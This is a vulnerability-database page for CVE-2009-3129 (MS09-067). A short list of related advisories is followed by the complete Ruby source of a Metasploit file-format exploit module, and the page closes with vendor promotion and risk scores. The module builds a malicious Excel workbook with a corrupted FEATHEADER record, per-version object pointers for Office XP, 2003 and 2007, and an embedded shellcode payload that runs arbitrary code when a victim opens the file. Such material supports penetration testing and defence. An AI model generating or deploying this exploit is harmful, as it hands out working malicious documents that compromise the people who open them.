Vulners
Lucene search
Microsoft Excel Malformed FEATHEADER Record Vulnerability
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | MS Excel Malformed FEATHEADER Record Exploit | 28 Aug 201000:00 | – | zdt |
 | CVE-2009-3129 | 11 Nov 200900:00 | – | attackerkb |
 | CVE-2009-3129 | 25 Sep 201000:00 | – | circl |
 | Microsoft Excel Featheader Record Memory Corruption Vulnerability | 3 Mar 202200:00 | – | cisa_kev |
 | Microsoft Office Excel Featheader Record Memory Corruption (MS09-067; CVE-2009-3129) | 10 Nov 200900:00 | – | checkpoint_advisories |
| Microsoft Office Excel Featheader Record Memory Corruption (MS09-067) - Ver2 (CVE-2009-3129) | 3 Mar 201400:00 | – | checkpoint_advisories |
 | CVE-2009-3129 | 11 Nov 200919:00 | – | cve |
 | CVE-2009-3129 | 11 Nov 200919:00 | – | cvelist |
 | Microsoft Excel - FEATHEADER Record (MS09-067) | 21 Aug 201000:00 | – | exploitdb |
 | Microsoft Excel - FEATHEADER Record (MS09-067) | 21 Aug 201000:00 | – | exploitpack |
10
`##
# $Id: ms09_067_excel_featheader.rb 8474 2010-02-13 06:57:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/ole'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Excel Malformed FEATHEADER Record Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of the FEATHEADER record
by Microsoft Excel. Revisions of Office XP and later prior to the release of the
MS09-067 bulletin are vulnerable.
When processing a FEATHEADER (Shared Feature) record, Microsoft used a data
structure from the file to calculate a pointer offset without doing proper
validation. Attacker supplied data is then used to calculate the location of an
object, and in turn a virtual function call. This results in arbitrary code
exection.
NOTE: On some versions of Office, the user will need to dismiss a warning dialog
prior to the payload executing.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sean Larsson', # original discovery
'jduck'
],
'Version' => '$Revision: 8474 $',
'References' =>
[
[ 'CVE','2009-3129' ],
[ 'OSVDB', '59860' ],
[ 'MSB', 'MS09-067' ],
[ 'BID', '36945' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-083/' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
#
# To find new targets, generate the file using the debug target and execute
# the following in windbg:
#
# 0:000> s -b 0 L?-1 04 00 00 00 ee ff c0 da
#
# Use the largest number + 9 (should be in the 0x30xxxxxx range)
#
# Office v10.6854.6845, excel.exe v10.0.6854.0
[ 'Microsoft Office 2002 (XP) SP3 English on Windows XP SP3 English',
{ 'ObjPtr' => 0x308082d0 }
],
# Office v11.5612.5606, excel.exe v11.0.5612.0
[ 'Microsoft Office 2003 SP0 English on Windows XP SP3 English',
{ 'ObjPtr' => 0x3085d430 }
],
# Office v12.0.6425.1000, excel.exe v12.0.6425.1000
[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English',
{ 'ObjPtr' => 0x30f69018 }
],
# crash on a deref path to heaven.
[ 'Crash Target for Debugging',
{ 'ObjPtr' => 0xdac0ffee }
]
],
'DisclosureDate' => 'Nov 10 2009'))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xls']),
], self.class)
end
def add_record(tag, data=nil)
ret = ""
ret << Rex::OLE::Util.pack16(tag)
data ||= ''
ret << Rex::OLE::Util.pack16(data.length)
ret << data
ret
end
def exploit
# build the Workbook stream
ptr1 = target['ObjPtr']
ptr2 = ptr1 + 4
ptr3 = ptr2 + 4
ptr4 = ptr3 + 4
bofdata = ""
bofdata << Rex::OLE::Util.pack16(0x0600)
bofdata << Rex::OLE::Util.pack16(0x0005)
bofdata << Rex::OLE::Util.pack16(0x1faa)
bofdata << Rex::OLE::Util.pack16(0x07cd)
bofdata << Rex::OLE::Util.pack32(0x000100c1)
bofdata << Rex::OLE::Util.pack32(0x00000406)
feathdr = ""
feathdr << Rex::OLE::Util.pack16(0x0867) # frt
feathdr << "\x00" * (10)
feathdr << Rex::OLE::Util.pack16(0x0004) # isf
feathdr << "\x01" # reserved
feathdr << Rex::OLE::Util.pack32(0x00000004) # cbHdrData
feathdr << [ptr1].pack('V')
feathdr << rand_text_alphanumeric(1) # alignment
feathdr << [ptr2].pack('V')
feathdr << [ptr3 - 0x28].pack('V')
feathdr << [ptr4].pack('V')
#feathdr << "\xcc"
feathdr << payload.encoded
content = ""
content << add_record(0x0809, bofdata)
content << add_record(0x0867, feathdr)
content << add_record(0x000a)
print_status("Creating Excel spreadsheet ...")
out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
raise RuntimeError, 'Unable to create output file'
end
stm = stg.create_stream("Workbook")
if (not stm)
raise RuntimeError, 'Unable to create workbook stream'
end
stm << content
stm.close
stg.close
print_status("Generated output file #{out}")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Feb 2010 00:00Current
0.4Low risk
Vulners AI Score0.4
EPSS0.91241